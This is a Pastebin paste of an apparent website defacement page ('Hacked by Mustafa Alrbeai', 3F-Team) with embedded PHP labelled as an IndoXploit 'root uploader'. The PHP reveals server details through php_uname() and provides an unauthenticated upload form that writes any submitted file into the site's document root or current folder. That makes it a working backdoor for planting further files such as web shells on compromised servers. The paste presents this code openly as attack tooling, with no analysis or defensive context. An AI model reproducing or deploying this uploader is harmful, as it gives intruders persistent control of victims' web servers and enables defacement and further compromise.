Advertisement
mustafav859

Untitled

Apr 23rd, 2017
140
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.04 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <html>
  3. <head>
  4. <title>Mustafa Alrbeai</title>
  5. <link rel="icon" type="image/png" href="https://cdn1.iconfinder.com/data/icons/lightly-selected/30/console-120.png"/>
  6. <link href="https://fonts.googleapis.com/css?family=Amiko" rel="stylesheet">
  7. <link href="https://fonts.googleapis.com/css?family=Ubuntu" rel="stylesheet">
  8. <meta name="Description" content="Hacked by Mustafa | Alrbeai">
  9. <meta name="keyword" content="Hacked by Mustafa Alrbeai">
  10. <meta name="googlebot" content="index,follow">
  11. <meta name="robots" content="all">
  12. <meta name="robots schedule" content="auto">
  13. <meta name="distribution" content="Alrbeai">
  14. <meta property="og:title" content="Website Hacked by Mustafa Alrbeai">
  15. <style>
  16. input[type=submit] {
  17. background: transparent;
  18. color: #ffffff;
  19. height: 24px;
  20. border: 1px solid #ffffff;
  21. margin: 5px auto;
  22. padding-left: 5px;
  23. font-family: 'Ubuntu';
  24. font-size: 13px;}
  25. .q1{background: #000000;
  26. color: #ffffff;
  27. font-family: 'Ubuntu';
  28. font-size: 13px;
  29. width: 100%;}
  30. a:hover{
  31. border-bottom:1px red solid;
  32. }
  33. body {
  34. background: black;
  35. }
  36. #embed {
  37. text-align:left;
  38. opacity:0;
  39. }
  40. img {
  41. opacity:1;-webkit-transition:all 250ms ease;-moz-transition:all 250ms ease;-o-transition:all 250ms ease;transition:all 250ms ease;
  42. margin-top:-10px;
  43. }
  44. img:hover{
  45. opacity:0.75
  46. }
  47. #tolol {
  48. font-family: 'Courier';
  49. position:absolute;
  50. left:0;
  51. right:0;
  52. top:30%;
  53. color:white;
  54. }
  55. hr {
  56. width:350px;
  57. }
  58. a {
  59. text-decoration: none;
  60. }
  61.  
  62.  
  63. </style>
  64. <link href="https://fonts.googleapis.com/css?family=Jura" rel="stylesheet">
  65. </head>
  66. <body bgcolor="black">
  67. <center>
  68. <br><br><br>
  69. <img src="http://lh5.googleusercontent.com/-NQQRdfPYDxw/Ul2rAOjnyMI/AAAAAAAAAD0/QT55X65SGoA/w331-h331/13331339942610.jpg" width="300" height="300">
  70. <p style="font-family:Jura; font-size:40px; color:#cccccc;"><font color="#cccccc">$ Mustafa Alrbeai</font> <font color="#E01919">$</font></p>
  71. <center><div class="q1"><?php
  72. echo "Priv8 Home Root Uploader by Mr. Error 404 - IndoXploit<br>";
  73. echo "<b>".php_uname()."</b><br>";
  74. echo "<form method='post' enctype='multipart/form-data'>
  75. <input type='file' name='idx_file'>
  76. <input type='submit' name='upload' value='upload'>
  77. </form>";
  78. $root = $_SERVER['DOCUMENT_ROOT'];
  79. $files = $_FILES['idx_file']['name'];
  80. $dest = $root.'/'.$files;
  81. if(isset($_POST['upload'])) {
  82. if(is_writable($root)) {
  83. if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
  84. $web = "http://".$_SERVER['HTTP_HOST']."/";
  85. echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  86. } else {
  87. echo "gagal upload di document root.";
  88. }
  89. } else {
  90. if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
  91. echo "sukses upload <b>$files</b> di folder ini";
  92. } else {
  93. echo "gagal upload";
  94. }
  95. }
  96.  
  97. }
  98. ?></div>
  99. <p style="font-family:Jura; font-size:19px; color:#E01919;">[ <font color="#cccccc">3F-Team</font> ] </p>
  100. </div>
  101. </center>
  102. </body>
  103. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement